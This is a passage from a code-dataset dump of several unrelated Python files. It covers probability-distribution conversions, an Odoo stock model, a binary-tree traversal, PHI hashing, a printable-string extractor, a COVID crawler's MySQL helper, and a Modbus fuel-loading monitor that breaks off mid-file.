Other Parameters\n ----------------\n xvals : `np.array`\n Locations at which the pdf is evaluated\n\n Returns\n -------\n data : `dict`\n The extracted data\n \"\"\"\n raise NotImplementedError('extract_fit')\n #xvals = kwargs.pop('xvals', None)\n #if xvals is None:\n # raise ValueError(\"To convert using extract_fit you must specify xvals\")\n ##vals = in_dist.pdf(xvals)\n\n\ndef extract_mixmod_fit_samples(in_dist, **kwargs):\n \"\"\"Convert to a mixture model using a set of values sample from the pdf\n\n Parameters\n ----------\n in_dist : `qp.Ensemble`\n Input distributions\n\n Other Parameters\n ----------------\n ncomps : `int`\n Number of components in mixture model to use\n nsamples : `int`\n Number of samples to generate\n random_state : `int`\n Used to reproducibly generate random variate from in_dist\n\n Returns\n -------\n data : `dict`\n The extracted data\n \"\"\"\n n_comps = kwargs.pop('ncomps', 3)\n n_sample = kwargs.pop('nsamples', 1000)\n random_state = kwargs.pop('random_state', None)\n samples = in_dist.rvs(size=n_sample, random_state=random_state)\n def mixmod_helper(samps):\n estimator = mixture.GaussianMixture(n_components=n_comps)\n estimator.fit(samps.reshape(-1, 1))\n weights = estimator.weights_\n means = estimator.means_[:, 0]\n stdevs = np.sqrt(estimator.covariances_[:, 0, 0])\n ov = np.vstack([weights, means, stdevs])\n return ov\n\n vv = np.vectorize(mixmod_helper, signature=\"(%i)->(3,%i)\" % (n_sample, n_comps))\n fit_vals = vv(samples)\n return dict(weights=fit_vals[:, 0, :], means=fit_vals[:, 1, :], stds=fit_vals[:, 2, :])\n\ndef extract_voigt_mixmod(in_dist, **kwargs): #pragma: no cover\n \"\"\"Convert to a voigt mixture model starting with a gaussian mixture model,\n trivially by setting gammas to 0\n\n Parameters\n ----------\n in_dist : `qp.Ensemble`\n Input distributions\n\n Returns\n -------\n data : `dict`\n The extracted data\n \"\"\"\n objdata = in_dist.objdata()\n means = objdata['means']\n stds = objdata['stds']\n weights = objdata['weights']\n gammas = np.zeros_like(means)\n return dict(means=means, stds=stds, weights=weights, gammas=gammas, **kwargs)\n\n\ndef extract_voigt_xy(in_dist, **kwargs): #pragma: no cover\n \"\"\"Build a voigt function basis and run a match-pursuit algorithm to fit gridded data\n\n Parameters\n ----------\n in_dist : `qp.Ensemble`\n Input distributions\n\n Returns\n -------\n data : `dict`\n The extracted data as sparse indices, basis, and metadata to rebuild the basis\n \"\"\"\n\n sparse_results = extract_voigt_xy_sparse(in_dist, **kwargs)\n indices = sparse_results['indices']\n meta = sparse_results['metadata']\n\n w, m, s, g = indices2shapes(indices, meta)\n return dict(means=m, stds=s, weights=w, gammas=g)\n\n\ndef extract_voigt_xy_sparse(in_dist, **kwargs): #pragma: no cover\n \"\"\"Build a voigt function basis and run a match-pursuit algorithm to fit gridded data\n\n Parameters\n ----------\n in_dist : `qp.Ensemble`\n Input distributions\n\n Returns\n -------\n data : `dict`\n The extracted data as shaped parameters means, stds, weights, gammas\n \"\"\"\n\n yvals = in_dist.objdata()['yvals']\n\n default = in_dist.metadata()['xvals'][0]\n z = kwargs.pop('xvals', default)\n nz = kwargs.pop('nz', 300)\n\n minz = np.min(z)\n _, j = np.where(yvals > 0)\n maxz = np.max(z[j])\n newz = np.linspace(minz, maxz, nz)\n interp = sciinterp.interp1d(z, yvals, assume_sorted=True)\n newpdf = interp(newz)\n newpdf = newpdf / sciint.trapz(newpdf, newz).reshape(-1, 1)\n ALL, bigD, _ = build_sparse_representation(newz, newpdf)\n return dict(indices=ALL, metadata=bigD)\n\ndef extract_sparse_from_xy(in_dist, **kwargs): #pragma: no cover\n \"\"\"Extract sparse representation from an xy interpolated representation\n\n Parameters\n ----------\n in_dist : `qp.Ensemble`\n Input distributions\n\n Other Parameters\n ----------------\n xvals : array-like\n Used to override the y-values\n xvals : array-like\n Used to override the x-values\n nvals : int\n Used to override the number of bins\n\n Returns\n -------\n metadata : `dict`\n Dictionary with data for sparse representation\n\n Notes\n -----\n This function will rebin to a grid more suited to the in_dist support by\n removing x-values corrsponding to y=0\n \"\"\"\n default = in_dist.objdata()['yvals']\n yvals = kwargs.pop('yvals', default)\n default = in_dist.metadata()['xvals'][0]\n xvals = kwargs.pop('xvals', default)\n nvals = kwargs.pop('nvals', 300)\n #rebin to a grid more suited to the in_dist support\n xmin = np.min(xvals)\n _, j = np.where(yvals > 0)\n xmax = np.max(xvals[j])\n newx = np.linspace(xmin, xmax, nvals)\n interp = sciinterp.interp1d(xvals, yvals, assume_sorted=True)\n newpdf = interp(newx)\n sparse_indices, metadata, _ = build_sparse_representation(newx, newpdf)\n metadata['xvals'] = newx\n metadata['sparse_indices'] = sparse_indices\n metadata.pop('Ntot')\n return metadata\n\n\ndef extract_xy_sparse(in_dist, **kwargs): #pragma: no cover\n \"\"\"Extract xy-interpolated representation from an sparese representation\n\n Parameters\n ----------\n in_dist : `qp.Ensemble`\n Input distributions\n\n Other Parameters\n ----------------\n xvals : array-like\n Used to override the y-values\n xvals : array-like\n Used to override the x-values\n nvals : int\n Used to override the number of bins\n\n Returns\n -------\n metadata : `dict`\n Dictionary with data for interpolated representation\n\n Notes\n -----\n This function will rebin to a grid more suited to the in_dist support by\n removing x-values corrsponding to y=0\n \"\"\"\n\n yvals = in_dist.objdata()['yvals']\n default = in_dist.metadata()['xvals'][0]\n xvals = kwargs.pop('xvals', default)\n nvals = kwargs.pop('nvals', 300)\n #rebin to a grid more suited to the in_dist support\n xmin = np.min(xvals)\n _, j = np.where(yvals > 0)\n xmax = np.max(xvals[j])\n newx = np.linspace(xmin, xmax, nvals)\n interp = sciinterp.interp1d(xvals, yvals, assume_sorted=True)\n newpdf = interp(newx)\n sparse_indices, sparse_meta, A = build_sparse_representation(newx, newpdf)\n #decode the sparse indices into basis indices and weights\n basis_indices, weights = decode_sparse_indices(sparse_indices)\n #retrieve the weighted array of basis functions for each object\n pdf_y = A[:, basis_indices] * weights\n #normalize and sum the weighted pdfs\n x = sparse_meta['z']\n y = pdf_y.sum(axis=-1)\n norms = sciint.trapz(y.T, x)\n y /= norms\n #super(sparse_gen, self).__init__(x, y.T, *args, **kwargs)\n xvals = x\n yvals = y.T\n return dict(xvals=xvals, yvals=yvals, **kwargs)\n","sub_path":"src/qp/conversion_funcs.py","file_name":"conversion_funcs.py","file_ext":"py","file_size_in_byte":11606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"263986994","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import models, fields, api\n\nclass MouvementStock(models.Model):\n\n _name = 'gctjara.mvtstock'\n \n _rec_name = 'numero'\n \n numero = fields.Char(\n string='Numero mvt',\n default=lambda self: self.env['ir.sequence'].next_by_code('gctjara.mvtstock.seq'))\n \n date = fields.Date(\n string='Date de Mvt' ,\n default=fields.datetime.now() \n )\n \n quantite = fields.Integer(\n string='Qte.'\n )\n \n quantitetot = fields.Float(\n string='Qte. Tôt.',\n digits=(16, 1),\n default=0.0,\n store=True\n )\n \n produit = fields.Many2one(\n string='Produits',\n comodel_name='gctjara.produitemballee'\n )\n type=fields.Char(\n string='Type')\n \n bonentree_id=fields.Many2one(\n string='Réf bon d\\'entrée',\n comodel_name='gctjara.bonentree'\n )\n bonlivraison_id=fields.Many2one(\n string='Réf bon de livraison',\n comodel_name='gctjara.bonlivraison'\n )\n","sub_path":"models/MouvementStock.py","file_name":"MouvementStock.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"88903443","text":"\"\"\"Created by sgoswami on 8/8/17.\"\"\"\n\"\"\"Given a binary tree, return the zigzag level order traversal of its nodes' values. (ie, from left to right, then \nright to left for the next level and alternate between).\"\"\"\n\nimport collections\n\n\nclass BST:\n def __init__(self):\n self.root = None\n\n def add(self, item):\n self.root = self.insert_helper(self.root, item)\n return self.root\n\n def insert_helper(self, root, item):\n if root is None:\n root = TreeNode(item)\n return root\n if item < root.val:\n root.left = self.insert_helper(root.left, item)\n else:\n root.right = self.insert_helper(root.right, item)\n return root\n\n def inorder(self):\n self.inorder_helper(self.root)\n\n def inorder_helper(self, root):\n if root is None:\n return\n self.inorder_helper(root.left)\n print(root.val, end=', ')\n self.inorder_helper(root.right)\n\n\nclass TreeNode(object):\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Solution(object):\n def zigzagLevelOrder(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[List[int]]\n \"\"\"\n res = []\n queue = collections.deque()\n delimiter = '#'\n trigger = False\n queue.appendleft(root)\n queue.appendleft(delimiter)\n level = collections.deque()\n while len(queue) > 0:\n curr = queue.pop()\n if curr == delimiter:\n res.append(list(level))\n level = collections.deque()\n if len(queue) > 0:\n queue.appendleft(delimiter)\n trigger = not trigger\n else:\n level.append(curr.val)\n if trigger:\n if curr.right:\n queue.appendleft(curr.right)\n if curr.left:\n queue.appendleft(curr.left)\n else:\n if curr.left:\n queue.appendleft(curr.left)\n if curr.right:\n queue.appendleft(curr.right)\n return res\n\n\nif __name__ == '__main__':\n bst = BST()\n bst.add(9)\n bst.add(3)\n bst.add(20)\n bst.add(15)\n bst.add(21)\n solution = Solution()\n print(solution.zigzagLevelOrder(bst.root))","sub_path":"python/binary_tree_zigzag_level_order_traversal.py","file_name":"binary_tree_zigzag_level_order_traversal.py","file_ext":"py","file_size_in_byte":2416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"71796396","text":"import json\nimport hashlib\nimport base64\nimport logging\nimport uuid\n\ndef hash_message(message, entity_map):\n hashed_message = hashlib.sha256(message.encode()).hexdigest()\n return hashed_message\n\ndef deidentify_entities_in_message(message, entity_list):\n entity_map = dict()\n for entity in entity_list:\n salted_entity = entity['Text'] + str(uuid.uuid4())\n hashkey = hashlib.sha256(salted_entity.encode()).hexdigest()\n entity_map[hashkey] = entity['Text']\n message = message.replace(entity['Text'], hashkey)\n return message, entity_map\n\ndef main(event):\n print('Received message payload')\n try:\n # Extract the entities and message from the event\n message = event['body']['message']\n entity_list = event['body']['entities']\n # Mask entities\n deidentified_message, entity_map = deidentify_entities_in_message(message, entity_list)\n hashed_message = hash_message(deidentified_message, entity_map)\n body = {\"deid_message\": deidentified_message,\"hashed_message\": hashed_message}\n response = {'statusCode':200, 'body':body}\n return response\n except Exception as e:\n logging.error('Exception: %s. Unable to extract entities from message' % e)\n raise e\n","sub_path":"applications/phi-data/ow/deidentify.py","file_name":"deidentify.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"96591054","text":"# for Python >= 3\n# see LICENSE file for licensing information\n\nimport re\nimport sys\nimport string\nimport ngram\n\nN_PRINT = 4\t# minimum number of printable chars to look for\n\nX = '0123456789abcdefghijklmnopqrstuvwxyz'\n\ndef code(s):\n\trv = ''\n\tfor i in range(len(s)-1):\n\t\tpair = s[i:i+2]\n\t\tdiff = abs(ord(pair[0]) - ord(pair[1]))\n\t\ttry:\n\t\t\trv += X[diff]\n\t\texcept IndexError:\n\t\t\treturn '!'\n\treturn rv\n\n# 1st \"derivative\"\nyawn = re.compile(r'(^.00+$) | (^00+.$) | (^11+$) | (.*000) | (.*11111) | (.*22222) | (.*33333) | (.*44444) | (.*55555) | (.*66666) | (.*77777) | (.*88888) | (.*99999)',\n\t\t\tre.VERBOSE|re.DOTALL)\n# 2nd \"derivative\"\nyawn2 = re.compile(r'(^.00+$) | (^00+.$) | (^11+$) | (.*000) | (.*1111) | (.*2222) | (.*3333) | (.*4444) | (.*5555) | (.*6666) | (.*7777) | (.*8888) | (.*9999)',\n\t\t\tre.VERBOSE|re.DOTALL)\n\ndef boring(s):\n\t# too short?\n\tif len(s) < N_PRINT:\n\t\treturn True\n\t# no vowels?\n\tfor ch in s:\n\t\tif ch in 'AEIOUYaeioiuy':\n\t\t\tbreak\n\telse:\n\t\treturn True\n\tif yawn.match(code(s)) is not None:\n\t\treturn True\n\tif yawn2.match(code(code(s))) is not None:\n\t\treturn True\n\treturn False\n\ndef filter_trigram(s):\n\tfor i in range(len(s)-2):\n\t\ttri = s[i:i+3]\n\t\tif tri in ngram.TRIGRAMS:\n\t\t\t# ignore low-frequency trigrams\n\t\t\tif ngram.TRIGRAMS[tri] < 75:\n\t\t\t\tcontinue\n\t\t\treturn True\n\treturn False\n\t\n# can't make this .+ or .* because it can capture the patterns we want\npattern = re.compile(r'( [A-Z][A-Z]+ ) | ( [a-z][a-z]+ ) | ( . )',\n\t\t\tre.VERBOSE|re.DOTALL)\n\ndef process(ps, label):\n\tL = []\n\tinteresting = False\n\tps = str(ps, 'ISO-8859-1')\t\t# sigh\n\tfor mo in re.finditer(pattern, ps):\n\t\tbold = False\n\t\tif mo.groups()[0] is not None:\n\t\t\t# uppercase alpha\n\t\t\ts = mo.groups()[0].lower()\n\t\t\tif not boring(s):\n\t\t\t\tif filter_trigram(s):\n\t\t\t\t\tinteresting = True\n\t\t\t\t\tbold = True\n\t\telif mo.groups()[1] is not None:\n\t\t\t# lowercase alpha\n\t\t\ts = mo.groups()[1].lower()\n\t\t\tif not boring(s):\n\t\t\t\tif filter_trigram(s):\n\t\t\t\t\tinteresting = True\n\t\t\t\t\tbold = True\n\t\telse:\n\t\t\t# nothing to see here\n\t\t\tpass\n\t\tL.append( (bold, mo.group(0)) )\n\n\tif interesting:\n\t\tif label is not None:\n\t\t\tprint('[', label, '] ', end='')\n\t\tfor bold, s in L:\n\t\t\tif not bold:\n\t\t\t\tsys.stdout.write(s)\n\t\t\telse:\n\t\t\t\tfor ch in s:\n\t\t\t\t\t# this emboldens in less (the pager)\n\t\t\t\t\tsys.stdout.write(ch)\n\t\t\t\t\t### uncomment for bold output\n\t\t\t\t\t#sys.stdout.write('\\b')\n\t\t\t\t\t#sys.stdout.write(ch)\n\t\t\t\t\t###\n\t\tsys.stdout.write('\\n')\n\n# newlines are annoying in line-based output; remove them\nprintable = ''.join([ch for ch in string.printable if ch != '\\n'])\n# Python 3 is such a joy\nprintable = bytes(printable, 'ISO-8859-1')\n\ndef newfile(file):\n\t# this is broken out so we can retain seen's contents across\n\t# multiple obfuscation candidates (when called by obfus engine)\n\tglobal seen\n\tseen = {}\n\ndef filter_printable(s, label=None):\n\tstart = 0\n\tisprintable = True\n\ts += b'\\xff'\t\t\t# append unprintable sentinel\n\tfor i in range(len(s)):\n\t\tif not isprintable:\n\t\t\tif s[i] in printable:\n\t\t\t\tstart = i\n\t\t\t\tisprintable = True\n\t\telse:\n\t\t\tif s[i] not in printable:\n\t\t\t\tisprintable = False\n\t\t\t\tif i-start >= N_PRINT:\n\t\t\t\t\t# canonicalize case so we don't\n\t\t\t\t\t# see a string candidate in both\n\t\t\t\t\t# upper and lower case\n\t\t\t\t\tkey = s[start:i].lower()\n\t\t\t\t\tif key not in seen:\n\t\t\t\t\t\tprocess(s[start:i], label)\n\t\t\t\t\t\tseen[key] = True\n\nif __name__ == '__main__':\n\tfor file in sys.argv[1:]:\n\t\t#print('==>', file, '<==')\n\t\ttry:\n\t\t\tf = open(file, 'rb')\n\t\t\ts = f.read()\n\t\t\tf.close()\n\t\texcept IOError as e:\n\t\t\tsys.stderr.write('%s: %s\\n' % (file, e.strerror))\n\t\t\tcontinue\n\t\tnewfile(file)\n\t\tfilter_printable(s)\n","sub_path":"training_data/stringlish.py","file_name":"stringlish.py","file_ext":"py","file_size_in_byte":3543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"174372214","text":"\"\"\"\n@ProjectName: DXY-2019-nCov-Crawler\n@FileName: db.py\n@Author: Jiabao Lin\n@Date: 2020/1/21\n\"\"\"\n\nimport pymysql\nfrom app.libs.mysqlconn import POOL\n\n\nclass DB:\n def __init__(self):\n self.db = None\n self.cursor = None\n\n def insert(self, collection, data):\n sql, params = self.get_insert_sql(collection, data)\n self.cursor.execute(sql, params)\n self.db.commit()\n\n def update(self, collection, data):\n sql = self.get_update_sql(collection, data)\n self.cursor.execute(sql)\n self.db.commit()\n\n def open_cursor(self):\n if not self.cursor and not self.db:\n self.db = POOL.connection()\n self.cursor = self.db.cursor(pymysql.cursors.DictCursor)\n\n def close_cursor(self, keep_cursor=False):\n if self.cursor and keep_cursor is False:\n self.cursor.close()\n self.db.close()\n self.cursor = None\n self.db = None\n return True\n else:\n return False\n\n @staticmethod\n def get_insert_sql(collection, data):\n sql = \"\"\n params = ()\n if collection == \"DXYArea\":\n sql = \"\"\"\n INSERT INTO area(country, provinceName, provinceShortName, confirmedCount, suspectedCount,\n curedCount, deadCount, comment, cities, updateTime, continents)\n VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\n \"\"\"\n params = (\n data['country'], data['provinceName'], data[\"provinceShortName\"], data[\"confirmedCount\"],\n data['suspectedCount'], data['curedCount'], data['deadCount'], data['comment'], data['cities'],\n data['updateTime'], data['continents']\n )\n\n elif collection == \"DXYOverall\":\n sql = \"\"\"\n INSERT INTO overall(countRemark, virus, infectSource, passWay, remark1,\n remark2, remark3, remark4, remark5, confirmedCount, suspectedCount, curedCount, deadCount, updateTime)\n VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\n \"\"\"\n params = (\n data['countRemark'], data['virus'], data['infectSource'], data['passWay'], data['remark1'],\n data['remark2'], data['remark3'], data['remark4'], data['remark5'], data['confirmedCount'],\n data['suspectedCount'], data['curedCount'], data['deadCount'], data['updateTime']\n )\n\n elif collection == 'location':\n sql = \"\"\"\n INSERT INTO location(province, city, district, address, longitude, latitude, count)\n VALUES (%s, %s, %s, %s, %s, %s, %s)\n \"\"\"\n params = (\n data['province'], data['city'], data['district'], data['address'], str(data['longitude']),\n str(data['latitude']), str(data['count'])\n )\n\n elif collection == 'day_add_list':\n sql = \"\"\"\n INSERT INTO daily(confirm, suspect, dead, heal, deadRate, healRate, Tdate)\n VALUES (%s, %s, %s, %s, %s, %s, %s)\n \"\"\"\n\n params = (\n data['confirm'], data['suspect'], data['dead'], data['heal'], data['deadRate'], data['healRate'],\n data['date']\n )\n\n elif collection == 'day_list':\n sql = \"\"\"\n INSERT INTO dayList(confirm, suspect, dead, heal, deadRate, healRate, Tdate)\n VALUES (%s, %s, %s, %s, %s, %s, %s)\n \"\"\"\n\n params = (\n data['confirm'], data['suspect'], data['dead'], data['heal'], data['deadRate'], data['healRate'],\n data['date']\n )\n\n return sql, params\n\n def is_repeat(self, collection, data):\n sql = ''\n if collection == \"DXYOverall\":\n sql = \"\"\"\n SELECT confirmedCount, suspectedCount, curedCount, deadCount\n FROM overall\n WHERE confirmedCount={} and suspectedCount={} and curedCount={} and deadCount={}\n \"\"\".format(str(data['confirmedCount']),\n str(data['suspectedCount']), str(data['curedCount']), str(data['deadCount']))\n elif collection == \"DXYArea\":\n sql = \"\"\"\n SELECT provinceName, confirmedCount, suspectedCount, curedCount, deadCount\n FROM area\n WHERE provinceName=\\\"{}\\\" and confirmedCount={} and suspectedCount={} and curedCount={} and deadCount={}\n \"\"\".format(data['provinceName'], str(data['confirmedCount']),\n str(data['suspectedCount']), str(data['curedCount']), str(data['deadCount']))\n\n elif collection == 'location':\n sql = \"\"\"\n SELECT *\n FROM location\n WHERE province =\\\"{}\\\" and city={} and district={} and address =\\\"{}\\\" and longitude={} and latitude={}\n \"\"\".format(data['province'], data['city'], data['district'], data['address'], str(data['longitude']),\n str(data['latitude']))\n\n elif collection == 'day_add_list':\n sql = \"\"\"\n SELECT *\n FROM daily\n WHERE Tdate=\\\"{}\\\"\n \"\"\".format(data['date'])\n\n elif collection == 'day_list':\n sql = \"\"\"\n SELECT *\n FROM dayList\n WHERE Tdate=\\\"{}\\\"\n \"\"\".format(data['date'])\n\n try:\n self.cursor.execute(sql)\n is_repeat = self.cursor.fetchall()\n except:\n is_repeat = False\n if is_repeat:\n return True\n else:\n return False\n\n @staticmethod\n def get_update_sql(collection, data):\n sql = ''\n\n if collection == 'location':\n sql = \"\"\"\n UPDATE location \n SET count=\\\"{}\\\"\n WHERE address =\\\"{}\\\" and longitude={} and latitude={}\n \"\"\".format(data['count'], data['address'], str(data['longitude']), str(data['latitude']))\n\n return sql\n","sub_path":"service/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":6146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"359563925","text":"#!/usr/bin/env python\r\n\r\n#Esto lo agregué\r\nfrom pymodbus.client.sync import ModbusTcpClient\r\nfrom urllib.parse import urlencode\r\nfrom urllib.request import Request, urlopen\r\nimport requests\r\nimport administracion_de_tareas\r\nimport time\t \r\n#import broker\r\n\r\nfrom tornado.websocket import websocket_connect\r\nimport asyncio\r\nimport json\r\n\r\n#import msvcrt\r\n\r\n#Esto no lo modifiqué\r\nimport logging\r\nimport json\r\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')\r\nlogging.getLogger().setLevel(logging.INFO)\r\n\r\n#from asyncproc import ProcessManager\r\n\r\n#manager = ProcessManager()\r\n\r\n#Esto lo agregué\r\nAPI_ENDPOINT=\"http://127.0.0.1:5510/endpointdata\"\r\nurl = \"ws://localhost:5500/patin\"\r\ndef listToString(s):\r\n str1=''\r\n i=0\r\n for ele in s:\r\n if i<1: str1+=chr(ele)\r\n elif i<2: str1+=chr(ele)+'-'\r\n elif i<3: str1+=chr(ele)\r\n elif i<4: str1+=chr(ele)+'-'\r\n elif i<5: str1+=chr(ele)\r\n elif i<6: str1+=chr(ele)+' '\r\n elif i<7: str1+=chr(ele)\r\n elif i<8: str1+=chr(ele)+':'\r\n elif i<9: str1+=chr(ele)\r\n elif i<10: str1+=chr(ele)+':'\r\n else: str1+=chr(ele)\r\n i=i+1\r\n return str1\r\n\r\ndef formato_flujo(n):\r\n return (\"{0:04.2f}\".format(float(n) ) ).zfill(7)\r\n\r\ndef formato_temperatura(n):\r\n return (\"{0:02.2f}\".format( float(n) )).zfill(5)\r\n\r\n\r\nasync def main():\r\n try:\r\n conn = await websocket_connect(url)\r\n client=ModbusTcpClient('192.168.0.200')\r\n #client.connect()\r\n\r\n while 1:\r\n \"\"\"\r\n if client.connect():\r\n #Fecha y hora\r\n timeStamp=client.read_holding_registers(0x0023,12,unit=1)\r\n #5.2.1. Preset quantity in whole units\r\n GOVsolicitado=client.read_holding_registers(4036,2,unit=1)\r\n #5.2.10. Component delivered gross quantity in whole units\r\n GOVcomponente=client.read_holding_registers(4372,2,unit=1)\r\n #5.2.8. Meter delivered gross quantity in whole units\r\n GOVtotal=client.read_holding_registers(4192,2,unit=1)\r\n #5.2.11. Component delivered net quantity in whole units\r\n GSV=client.read_holding_registers(4564,2,unit=1)\r\n #5.2.7. Preset gross flow rate in whole units\r\n flujoPreset=client.read_holding_registers(4180,2,unit=1)\r\n #5.2.9. Meter gross flow rate in whole units\r\n flujoTR=client.read_holding_registers(4312,2,unit=1)\r\n #5.2.13. Component batch average pressure in tenths or hundredths\r\n presionPreset=client.read_holding_registers(4948,2,unit=1)\r\n #5.2.16. Component current pressure in hundredths\r\n presionTR=client.read_holding_registers(4948,2,unit=1)\r\n #5.2.17. Component current density in tenths\r\n densidadTR=client.read_holding_registers(5716,2,unit=1)\r\n #5.2.14. Component batch average density/relative density/gravity\r\n densidadComponent=client.read_holding_registers(5140,2,unit=1)\r\n #5.2.15. Component current temp in hundredths\r\n temperaturaTRrgl=client.read_holding_registers(5332,2,unit=1)\r\n temperaturaTRprm=client.read_holding_registers(5334,2,unit=1)\r\n #5.2.4. Preset batch average temp in tenths or hundredths\r\n temperaturaAvg=client.read_holding_registers(4108,2,unit=1)\r\n #5.2.22. Component current mass delivered\r\n masaTR=client.read_holding_registers(6868,2,unit=1)\r\n #5.2.20. Component current BSW hund\r\n BSWTR=client.read_holding_registers(6484,2,unit=1)\r\n #5.2.22. Component current API gravity tenths\r\n gravidadTR=client.read_holding_registers(6676,2,unit=1)\r\n #Meter k-factor\r\n kFactor=client.read_holding_registers(1770,2,unit=1)\r\n\r\n if temperaturaTRprm.registers[0]!=0:\r\n producto=\"premium\"\r\n else:\r\n producto=\"regular\"\r\n else:\r\n timeStamp.registers[0]=[0,0]\r\n GOVsolicitado.registers[0]=0\r\n GOVcomponente.registers[0]=0\r\n GOVtotal.registers[0]=0\r\n GSV.registers[0]=0\r\n flujoPreset.registers[0]=0\r\n flujoTR.registers[0]=0\r\n presionPreset.registers[0]=0\r\n presionTR.registers[0]=0\r\n densidadTR.registers[0]=0\r\n densidadComponent.registers[0]=0\r\n temperaturaTRrgl.registers[0]=0\r\n temperaturaTRprm.registers[0]=0\r\n temperaturaAvg.registers[0]=0\r\n masaTR.registers[0]=0\r\n BSWTR.registers[0]=0\r\n gravidadTR.registers[0]=0\r\n kFactor.registers[0]=0\r\n producto=\"regular\"\t\r\n \"\"\"\r\n\r\n\r\n client.connect()\r\n #Fecha y hora\r\n timeStamp=client.read_holding_registers(0x0023,12,unit=1)\r\n #5.2.1. Preset quantity in whole units\r\n GOVsolicitado=client.read_holding_registers(4036,2,unit=1)\r\n #5.2.10. Component delivered gross quantity in whole units\r\n GOVcomponente=client.read_holding_registers(4372,2,unit=1)\r\n #5.2.8. Meter delivered gross quantity in whole units\r\n GOVtotal=client.read_holding_registers(4192,2,unit=1)\r\n #5.2.11. Component delivered net quantity in whole units\r\n GSV=client.read_holding_registers(4564,2,unit=1)\r\n #5.2.7. Preset gross flow rate in whole units\r\n flujoPreset=client.read_holding_registers(4180,2,unit=1)\r\n #5.2.9. Meter gross flow rate in whole units\r\n flujoTR=client.read_holding_registers(4312,2,unit=1)\r\n #5.2.13. Component batch average pressure in tenths or hundredths\r\n presionPreset=client.read_holding_registers(4948,2,unit=1)\r\n #5.2.16. Component current pressure in hundredths\r\n presionTR=client.read_holding_registers(4948,2,unit=1)\r\n #5.2.17. Component current density in tenths\r\n densidadTR=client.read_holding_registers(5716,2,unit=1)\r\n #5.2.14. Component batch average density/relative density/gravity\r\n densidadComponent=client.read_holding_registers(5140,2,unit=1)\r\n #5.2.15. Component current temp in hundredths\r\n temperaturaTRrgl=client.read_holding_registers(5332,2,unit=1)\r\n temperaturaTRprm=client.read_holding_registers(5334,2,unit=1)\r\n #5.2.4. Preset batch average temp in tenths or hundredths\r\n temperaturaAvg=client.read_holding_registers(4108,2,unit=1)\r\n #5.2.22. Component current mass delivered\r\n masaTR=client.read_holding_registers(6868,2,unit=1)\r\n #5.2.20. Component current BSW hund\r\n BSWTR=client.read_holding_registers(6484,2,unit=1)\r\n #5.2.22. Component current API gravity tenths\r\n gravidadTR=client.read_holding_registers(6676,2,unit=1)\r\n #Meter k-factor\r\n kFactor=client.read_holding_registers(1770,2,unit=1)\r\n\r\n if temperaturaTRprm.registers[0]!=0:\r\n producto=\"premium\"\r\n else:\r\n producto=\"regular\"\r\n\r\n\r\n #Esto lo modifiqué con mis variables\r\n servidor_driver_ucl = {\r\n \"timestamp\": listToString(timeStamp.registers),\r\n \"data\": \"Lorem ipsum dolor sit amet, consectetur adipiscing elit.\",\r\n \"config\": {\r\n \"version\": 0.1,\r\n \"tipo\": \"driver_ucl_rt\",\r\n },\r\n \"ucl\":{\r\n \"config\": {\r\n \"version\": 0.1,\r\n \"tipo\": \"ucl\",\r\n \"id_instrumentacion\": \"23\",\r\n \"nombre\": \"UCL 01\",\r\n \"producto1\": \"regular\",\r\n \"producto2\": \"premium\"\r\n },\r\n \"servidor\": {\r\n \"online\": True,\r\n },\r\n \"online_status\": {\r\n \"estado_en_espera\": False,\r\n \"estado_en_uso\": True,\r\n },\r\n \"data_orden\":{\r\n \"id_orden_actual\": \"23\",\r\n \"cantidad_programada\": str(GOVsolicitado.registers[0]),\r\n \"cantidad_componente\": str(GOVcomponente.registers[0]),\r\n \"cantidad_cargada\": str(GOVtotal.registers[0]),\r\n \"cantidad_restante\": str(GOVtotal.registers[0]-GOVsolicitado.registers[0]),\r\n \"cantidad_gsv\": str(GSV.registers[0]),\r\n \"unidad\": \"l\",\r\n \"producto\": producto\r\n\r\n }\r\n },\r\n\r\n \"mdp\":{\r\n \"config\": {\r\n \"version\": 0.1,\r\n \"tipo\": \"mdp\",\r\n \"id_instrumentacion\": \"23\",\r\n },\r\n \"servidor\": {\r\n \"online\": True,\r\n },\r\n \"online_status\": {\r\n \"estado_en_espera\": False,\r\n \"estado_en_uso\": True\r\n },\r\n \"data\": {\r\n \"flujo\": formato_flujo(str(flujoTR.registers[0])),\r\n \"flujoPreset\": str(flujoPreset.registers[0]),\r\n \"unidad\": \"l/min\",\r\n }\r\n },\r\n \"rtd\":{\r\n \"config\": {\r\n \"version\": 0.1,\r\n \"tipo\": \"rtd\",\r\n \"id_instrumentacion\": \"26\",\r\n },\r\n \"servidor\": {\r\n \"online\": True,\r\n },\r\n \"online_status\": {\r\n \"estado_sensando\": True\r\n },\r\n \"data\": {\r\n \"temperatura\": formato_temperatura(str((temperaturaTRrgl.registers[0]/100)+(temperaturaTRprm.registers[0]/100))),\r\n \"temperaturaAvg\": str(temperaturaAvg.registers[0]),\r\n \"unidad\": \"c\",\r\n }\r\n },\r\n \"baumanometro\":{\r\n \"config\": {\r\n \"version\": 0.1,\r\n \"tipo\": \"baumanometro\",\r\n \"id_instrumentacion\": \"36\",\r\n },\r\n \"servidor\": {\r\n \"online\": True,\r\n },\r\n \"online_status\": {\r\n \"estado_sensando\": True\r\n },\r\n \"data\": {\r\n \"presion\": str(presionTR.registers[0]),\r\n \"presionPreset\": str(presionPreset.registers[0]),\r\n \"unidad\": \"kPa\",\r\n }\r\n },\r\n \"densimetro\":{\r\n \"config\": {\r\n \"version\": 0.1,\r\n \"tipo\": 